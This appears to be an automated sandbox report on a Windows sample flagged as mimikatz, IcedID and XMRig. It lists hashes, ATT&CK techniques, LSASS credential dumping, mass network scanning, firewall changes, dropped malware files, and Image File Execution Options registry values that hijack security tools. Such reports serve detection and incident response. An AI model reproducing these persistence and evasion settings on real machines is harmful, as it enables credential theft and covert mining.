mimikatz | 7b2fea111d9c5e1a7f6ee27e25b18bf8c5cc8e9fa6ccc049d54be95939f76ea0

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-01-2025 01:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe
Size

13.4MB
MD5

d38fb570d33d6d38d82af8e614fc360e
SHA1

6251ed045eda3daeaa7d6b625829f7f6b035c9ba
SHA256

7b2fea111d9c5e1a7f6ee27e25b18bf8c5cc8e9fa6ccc049d54be95939f76ea0
SHA512

0cf2ca0375c64fe2e2cafc3a509a0a08f1e8169db8afb1c71ea95adb9913e1cdbfb34917f75ff5306c2205b6a7da9543debadee2ea250cbc5cd96425d2f83eae
SSDEEP

98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 464 created 1436	464	gaettyt.exe	37

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (30569) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/5104-179-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-183-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-204-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-217-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-226-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-235-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-248-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-492-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-494-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-496-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-751-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig
behavioral2/memory/5104-752-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 6 IoCs

resource	yara_rule
behavioral2/memory/1028-0-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/1028-4-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/files/0x0007000000023c94-6.dat	mimikatz
behavioral2/memory/1616-8-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/4964-136-0x00007FF794740000-0x00007FF79482E000-memory.dmp	mimikatz
behavioral2/memory/4964-138-0x00007FF794740000-0x00007FF79482E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	gaettyt.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	gaettyt.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	gaettyt.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2880	netsh.exe
3456	netsh.exe

Executes dropped EXE 28 IoCs

pid	Process
1616	gaettyt.exe
464	gaettyt.exe
1940	wpcap.exe
3128	bilutlrif.exe
4964	vfshost.exe
4656	spitymcii.exe
452	xohudmc.exe
2132	ditzew.exe
5104	ceuhqk.exe
1236	spitymcii.exe
2604	spitymcii.exe
620	spitymcii.exe
3404	spitymcii.exe
4800	spitymcii.exe
3176	spitymcii.exe
2940	spitymcii.exe
4208	gaettyt.exe
880	spitymcii.exe
5000	spitymcii.exe
4892	spitymcii.exe
3004	spitymcii.exe
4104	spitymcii.exe
2384	spitymcii.exe
736	spitymcii.exe
1940	spitymcii.exe
3180	spitymcii.exe
1732	lutllwily.exe
1928	gaettyt.exe

Loads dropped DLL 12 IoCs

pid	Process
1940	wpcap.exe
1940	wpcap.exe
1940	wpcap.exe
1940	wpcap.exe
1940	wpcap.exe
1940	wpcap.exe
1940	wpcap.exe
1940	wpcap.exe
1940	wpcap.exe
3128	bilutlrif.exe
3128	bilutlrif.exe
3128	bilutlrif.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
65	ifconfig.me
66	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	gaettyt.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	gaettyt.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	gaettyt.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	gaettyt.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F	gaettyt.exe
File created	C:\Windows\SysWOW64\ditzew.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	gaettyt.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\ditzew.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	gaettyt.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F	gaettyt.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	gaettyt.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	gaettyt.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	gaettyt.exe

UPX packed file 36 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ce7-135.dat	upx
behavioral2/memory/4964-136-0x00007FF794740000-0x00007FF79482E000-memory.dmp	upx
behavioral2/memory/4964-138-0x00007FF794740000-0x00007FF79482E000-memory.dmp	upx
behavioral2/files/0x0007000000023cf2-141.dat	upx
behavioral2/memory/4656-142-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/4656-160-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/files/0x0007000000023cef-163.dat	upx
behavioral2/memory/5104-165-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/1236-172-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/2604-176-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/5104-179-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/620-181-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/5104-183-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/3404-186-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/4800-190-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/3176-194-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/2940-198-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/5104-204-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/880-207-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/5000-211-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/4892-215-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/5104-217-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/3004-220-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/4104-224-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/5104-226-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/2384-229-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/736-232-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/1940-234-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/5104-235-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/3180-237-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp	upx
behavioral2/memory/5104-248-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/5104-492-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/5104-494-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/5104-496-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/5104-751-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx
behavioral2/memory/5104-752-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\utbcclcbi\UnattendGC\svschost.xml	gaettyt.exe
File opened for modification	C:\Windows\qpkiztfb\svschost.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\posh-0.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\trfo-2.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\zlib1.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\vimpcsvc.exe	gaettyt.exe
File opened for modification	C:\Windows\qpkiztfb\vimpcsvc.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\AppCapture64.dll	gaettyt.exe
File created	C:\Windows\ime\gaettyt.exe	gaettyt.exe
File opened for modification	C:\Windows\utbcclcbi\kgwtlrdzw\Packet.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\crli-0.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\ssleay32.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\ucl.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\spoolsrv.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\Corporate\mimidrv.sys	gaettyt.exe
File created	C:\Windows\utbcclcbi\kgwtlrdzw\Packet.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\libxml2.dll	gaettyt.exe
File created	C:\Windows\qpkiztfb\svschost.xml	gaettyt.exe
File opened for modification	C:\Windows\qpkiztfb\spoolsrv.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\kgwtlrdzw\wpcap.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\exma-1.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\spoolsrv.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\schoedcl.xml	gaettyt.exe
File created	C:\Windows\qpkiztfb\spoolsrv.xml	gaettyt.exe
File created	C:\Windows\qpkiztfb\vimpcsvc.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\Corporate\vfshost.exe	gaettyt.exe
File created	C:\Windows\utbcclcbi\kgwtlrdzw\bilutlrif.exe	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\tucl-1.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\spoolsrv.exe	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\vimpcsvc.xml	gaettyt.exe
File created	C:\Windows\qpkiztfb\gaettyt.exe	2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\tibe-2.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\svschost.exe	gaettyt.exe
File opened for modification	C:\Windows\qpkiztfb\docmicfg.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\docmicfg.exe	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\schoedcl.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\svschost.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\cnli-1.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\Shellcode.ini	gaettyt.exe
File created	C:\Windows\utbcclcbi\upbdrjv\swrpwe.exe	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\coli-0.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\schoedcl.exe	gaettyt.exe
File created	C:\Windows\qpkiztfb\docmicfg.xml	gaettyt.exe
File created	C:\Windows\qpkiztfb\schoedcl.xml	gaettyt.exe
File opened for modification	C:\Windows\utbcclcbi\kgwtlrdzw\Result.txt	lutllwily.exe
File opened for modification	C:\Windows\qpkiztfb\gaettyt.exe	2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\libeay32.dll	gaettyt.exe
File opened for modification	C:\Windows\qpkiztfb\schoedcl.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\kgwtlrdzw\scan.bat	gaettyt.exe
File created	C:\Windows\utbcclcbi\kgwtlrdzw\ip.txt	gaettyt.exe
File created	C:\Windows\utbcclcbi\kgwtlrdzw\lutllwily.exe	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\docmicfg.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\docmicfg.xml	gaettyt.exe
File opened for modification	C:\Windows\utbcclcbi\Corporate\log.txt	cmd.exe
File created	C:\Windows\utbcclcbi\kgwtlrdzw\wpcap.exe	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\trch-1.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\Corporate\mimilib.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\specials\xdvl-0.dll	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\vimpcsvc.xml	gaettyt.exe
File created	C:\Windows\utbcclcbi\UnattendGC\AppCapture32.dll	gaettyt.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2964	sc.exe
1584	sc.exe
2744	sc.exe
3508	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
